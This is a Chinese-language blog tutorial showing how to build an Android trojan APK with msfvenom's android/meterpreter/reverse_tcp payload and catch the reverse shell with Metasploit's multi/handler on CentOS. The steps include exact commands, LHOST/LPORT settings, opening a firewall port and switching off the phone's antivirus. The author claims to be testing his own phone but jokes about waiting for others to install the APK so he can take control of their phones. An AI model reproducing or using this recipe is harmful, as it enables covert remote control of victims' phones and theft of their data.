Centos Linux下使用Metasploit渗透androi

71 阅读3分钟

复制一下黄色框的字段,tcp格式的,接下来会用到

android/meterpreter/reverse_tcp

知道了“木马”的名称,还得知道终端的ip,输入ifconfig查看内网ip(俺的是本地测试的)

$ ifconfig

ip拿到了,还不赶紧的开始生成木木马-_-,msfvenom兄弟,靠你了,输入

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.122.129 LPORT=3333 R > first.apk

-p, --payload 使用攻击负荷。指定一个’-'或者输入(stdin)用户自定义的payloads(攻击负荷)。

LHOST ip地址

LPORT 自定义端口(注意,那些所谓的防火墙全踏马都要关闭,记得端口要放行且没被占用,不然渗透没软用)

生成的木马最好能放在一个可以访问的文件夹上,我直接first.apk,在终端目前路径上可以看到有文件生成。如果没有,那就是失败了,检查一下你的端口是否占用!生成成功的编译大概会出现Payload size: 10181 bytes字段

木马生成完毕,msfvenom兄弟的工作就基本完工了,接下来就有请msfconsole上场了,没错,就是打开metasploit的控制台,着手配置相关信息,开始渗透了~

直接输入msfconsole

$ msfconsole

长久看多了单调代码的你,下面的图形代码有没有让你灰色的世界多点点色彩~~

谈正事~我们需要配置什么呢?前面生成木马的时候不是设置了ip和端口吗?现在我们也要在控制台上配置ip和端口,做监听来的

要做的流程大概是这些

(在msfconsole模式下)加载exploit模块

msf > use exploit/multi/handler

(exploit模式下)选择之前我们粘贴过一次的攻击载荷:android/meterpreter/reverse_tcp

msf exploit(multi/handler)> set payload android/meterpreter/reverse_tcp

(exploit模式下)查看一下列表有没有多出你设置的载荷

msf exploit(multi/handler)> show options

(exploit模式下)设置黄色框下的LHOST和LPORT,就设置成之前生成木马搞的ip和端口

顺便放行端口,输入命令firewall-cmd --add-port=3333/tcp

firewall-cmd --add-port=3333/tcp # 开放通过tcp访问3333

配置的流程都搞完了,马上就是渗透了。

群灵觉醒,封印解除,出来吧!exploit

输入命令exploit,开始监控,记住不要关掉,就坐等别人的手机安装,然后别人点击的瞬间,俺这里马上获取到别人手机的控制权,到时候,嘿嘿。当然,俺这里是渗透自己的手机(然并软—~)

既然是渗透自己的手机,把生成的木马拿出来下载吧,俺这里是ftp连接linux成功后,找到木马下载安装到自己的手机上(杀毒软件请关掉),我用的是xftp,只要你能把那个木马拿出来下载,管你用什么办法~~

安装好木马后,点击打开的瞬间,没有啥反应。手机上没反应没关系,关键是终端exploit监听有反应,并且开始渗透并成功。

如果终端没有反应,就是防火墙的问题,设置的端口要放行

输个?,查看命令列表

比如查看下手机信息